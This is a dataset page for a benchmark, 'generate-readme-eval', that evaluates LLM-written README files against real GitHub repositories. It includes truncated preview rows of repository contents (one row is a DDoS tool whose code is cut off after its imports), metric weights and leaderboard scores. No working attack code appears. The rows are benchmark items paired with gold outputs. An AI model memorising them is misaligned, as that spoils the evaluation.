![fuzzing](https://image.ibb.co/fnhuFL/Screenshot-2018-11-19-14-04-46.png)
#### Bruteforcing payloads from a file
![bruteforcing](https://image.ibb.co/dy5EFL/Screenshot-2018-11-19-14-08-36.png)
#### Interactive HTTP Headers Prompt
![headers](https://image.ibb.co/ecNph0/Screenshot-2018-11-19-14-29-35.png)
#### Hidden Parameter Discovery
![arjun](https://image.ibb.co/effjh0/Screenshot-2018-11-19-14-16-51.png)
### Contribution, Credits & License
Ways to contribute
- Suggest a feature
- Report a bug
- Fix something and open a pull request
- Help me document the code
- Spread the word
Licensed under the GNU GPLv3, see [LICENSE](LICENSE) for more information.
The WAF signatures in `/db/wafSignatures.json` are taken & modified from [sqlmap](https://github.com/sqlmapproject/sqlmap). I extracted them from sqlmap's waf detection modules which can found [here](https://github.com/sqlmapproject/sqlmap/blob/master/waf/) and converted them to JSON.\
`/plugins/retireJS.py` is a modified version of [retirejslib](https://github.com/FallibleInc/retirejslib/).
|
ItChat | d5ce5db32ca15cef8eefa548a438a9fcc4502a6d | "File: setup.py\n\n\"\"\" A wechat personal account api project\nSee:\nhttps://github.com/littlecode(...TRUNCATED) | "# itchat\n\n[![Gitter][gitter-picture]][gitter] ![py27][py27] ![py35][py35] [English version][engli(...TRUNCATED) |
babyagi | 11c853dbfc087cd96e034e7488d6f895248ba63a | "File: babyagi.py\n\n#!/usr/bin/env python3\nfrom dotenv import load_dotenv\n\n# Load default enviro(...TRUNCATED) | "# Translations:\n\n[<img title=\"عربي\" alt=\"عربي\" src=\"https://cdn.staticaly.com/gh/hjn(...TRUNCATED) |
OpenVoice | f3cf835540572ade1460c8952f39d53e4f7952df | "File: setup.py\n\nfrom setuptools import setup, find_packages\n\n\nsetup(name='MyShell-OpenVoice',\(...TRUNCATED) | "<div align=\"center\">\n <div> </div>\n <img src=\"resources/openvoicelogo.jpg\" width=\"400(...TRUNCATED) |
cli | f4cf43ecdd6c5c52b5c4ba91086d5c6ccfebcd6d | "File: setup.py\n\nfrom setuptools import setup\n\nsetup()\n\n\n\nFile: docs/installation/generate.p(...TRUNCATED) | "<h2 align=\"center\">\n <a href=\"https://httpie.io\" target=\"blank_\">\n <img height=\"(...TRUNCATED) |
awesome-machine-learning | 4964cff36225e9951c6c6a398fb925f269532b1b | "File: scripts/pull_R_packages.py\n\n#!/usr/bin/python\n\n\"\"\"\n This script will scrape the r-(...TRUNCATED) | "# Awesome Machine Learning [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78(...TRUNCATED) |
interactive-coding-challenges | 358f2cc60426d5c4c3d7d580910eec9a7b393fa9 | "File: __init__.py\n\n\n\n\nFile: recursion_dynamic/__init__.py\n\n\n\n\nFile: recursion_dynamic/pow(...TRUNCATED) | "<br/>\n<p align=\"center\">\n <img src=\"https://raw.githubusercontent.com/donnemartin/interactive(...TRUNCATED) |
MHDDoS | 74a6d0ca4aeecb92ebc8f38917c722bc4226ebde | "File: start.py\n\n#!/usr/bin/env python3\n \nfrom concurrent.futures import ThreadPoolExecutor, as_(...TRUNCATED) | "<p align=\"center\"><img src=\"https://i.ibb.co/3F6V9JQ/MHDDoS.png\" width=\"400px\" height=\"150px(...TRUNCATED) |
llama | 8fac8befd776bc03242fe7bc2236cdb41b6c609c | "File: example_text_completion.py\n\n# Copyright (c) Meta Platforms, Inc. and affiliates.\n# This so(...TRUNCATED) | "## **Note of deprecation**\n\nThank you for developing with Llama models. As part of the Llama 3.1 (...TRUNCATED) |
python-mini-projects | e0cfd4b0fe5e0bb4d443daba594e83332d5fb720 | "File: projects/birthDateToCurrentAge.py\n\nfrom datetime import date # import(...TRUNCATED) | "<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![forthebadge](https(...TRUNCATED) |
Generate README Eval
The generate-readme-eval is a dataset (train split) and benchmark (test split) to evaluate the effectiveness of LLMs
when summarizing entire GitHub repos in form of a README.md file. The datset is curated from top 400 real Python repositories
from GitHub with at least 1000 stars and 100 forks. The script used to generate the dataset can be found here.
For the dataset we restrict ourselves to GH repositories that are less than 100k tokens in size to allow us to put the entire repo
in the context of LLM in a single call. The train
split of the dataset can be used to fine-tune your own model, the results
reported here are for the test
split.
To evaluate a LLM on the benchmark we can use the evaluation script given here. During evaluation we prompt
the LLM to generate a structured README.md file using the entire contents of the repository (repo_content
). We evaluate the output
response from LLM by comparing it with the actual README file of that repository across several different metrics.
In addition to the traditional NLP metircs like BLEU, ROUGE scores and cosine similarity, we also compute custom metrics that capture structural similarity, code consistency (from code to README), readability (FRES) and information retrieval. The final score is generated between by taking a weighted average of the metrics. The weights used for the final score are shown below.
weights = {
'bleu': 0.1,
'rouge-1': 0.033,
'rouge-2': 0.033,
'rouge-l': 0.034,
'cosine_similarity': 0.1,
'structural_similarity': 0.1,
'information_retrieval': 0.2,
'code_consistency': 0.2,
'readability': 0.2
}
At the end of evaluation the script will print the metrics and store the entire run in a log file. If you want to add your model to the leaderboard please create a PR with the log file of the run and details about the model.
If we use the existing README.md files in the repositories as the golden output, we would get a score of 56.79 on this benchmark.
We can validate it by running the evaluation script with --oracle
flag.
The oracle run log is available here.
Leaderboard
The current SOTA model on this benchmark in zero shot setting is Gemini-1.5-Flash-Exp-0827. It scores the highest across a number of different metrics.
Model | Score | BLEU | ROUGE-1 | ROUGE-2 | ROUGE-l | Cosine-Sim | Structural-Sim | Info-Ret | Code-Consistency | Readability | Logs |
---|---|---|---|---|---|---|---|---|---|---|---|
llama3.1-8b-instruct | 24.43 | 0.72 | 11.96 | 1.69 | 11.51 | 30.29 | 24.16 | 44.50 | 7.96 | 37.90 | link |
mistral-nemo-instruct-2407 | 25.62 | 1.09 | 11.24 | 1.70 | 10.94 | 26.62 | 24.26 | 52.00 | 8.80 | 37.30 | link |
gpt-4o-mini-2024-07-18 | 32.16 | 1.64 | 15.46 | 3.85 | 14.84 | 40.57 | 23.81 | 72.50 | 4.77 | 44.81 | link |
gpt-4o-2024-08-06 | 33.13 | 1.68 | 15.36 | 3.59 | 14.81 | 40.00 | 23.91 | 74.50 | 8.36 | 44.33 | link |
o1-mini-2024-09-12 | 33.05 | 3.13 | 15.39 | 3.51 | 14.81 | 42.49 | 27.55 | 80.00 | 7.78 | 35.27 | link |
gemini-1.5-flash-8b-exp-0827 | 32.12 | 1.36 | 14.66 | 3.31 | 14.14 | 38.31 | 23.00 | 70.00 | 7.43 | 46.47 | link |
gemini-1.5-flash-exp-0827 | 33.43 | 1.66 | 16.00 | 3.88 | 15.33 | 41.87 | 23.59 | 76.50 | 7.86 | 43.34 | link |
gemini-1.5-pro-exp-0827 | 32.51 | 2.55 | 15.27 | 4.97 | 14.86 | 41.09 | 23.94 | 72.82 | 6.73 | 43.34 | link |
oracle-score | 56.79 | 100.00 | 100.00 | 100.00 | 100.00 | 100.00 | 98.24 | 59.00 | 11.01 | 14.84 | link |
Few-Shot
This benchmark is interesting because it is not that easy to few-shot your way to improve performance. There are couple of reasons for that:
The average context length required for each item can be up to 100k tokens which makes it out of the reach of most models except Google Gemini which has a context legnth of up to 2 Million tokens.
There is a trade-off in accuracy inherit in the benchmark as adding more examples makes some of the metrics like
information_retrieval
andreadability
worse. At larger contexts models do not have perfect recall and may miss important information.
Our experiments with few-shot prompts confirm this, the maximum overall score is at 1-shot and adding more examples doesn't help after that.
Model | Score | BLEU | ROUGE-1 | ROUGE-2 | ROUGE-l | Cosine-Sim | Structural-Sim | Info-Ret | Code-Consistency | Readability | Logs |
---|---|---|---|---|---|---|---|---|---|---|---|
0-shot-gemini-1.5-flash-exp-0827 | 33.43 | 1.66 | 16.00 | 3.88 | 15.33 | 41.87 | 23.59 | 76.50 | 7.86 | 43.34 | link |
1-shot-gemini-1.5-flash-exp-0827 | 35.40 | 21.81 | 34.00 | 24.97 | 33.61 | 61.53 | 37.60 | 61.00 | 12.89 | 27.22 | link |
3-shot-gemini-1.5-flash-exp-0827 | 33.10 | 20.02 | 32.70 | 22.66 | 32.21 | 58.98 | 34.54 | 60.50 | 13.09 | 20.52 | link |
5-shot-gemini-1.5-flash-exp-0827 | 33.97 | 19.24 | 32.31 | 21.48 | 31.74 | 61.49 | 33.17 | 59.50 | 11.48 | 27.65 | link |
7-shot-gemini-1.5-flash-exp-0827 | 33.00 | 15.43 | 28.52 | 17.18 | 28.07 | 56.25 | 33.55 | 63.50 | 12.40 | 24.15 | link |
- Downloads last month
- 46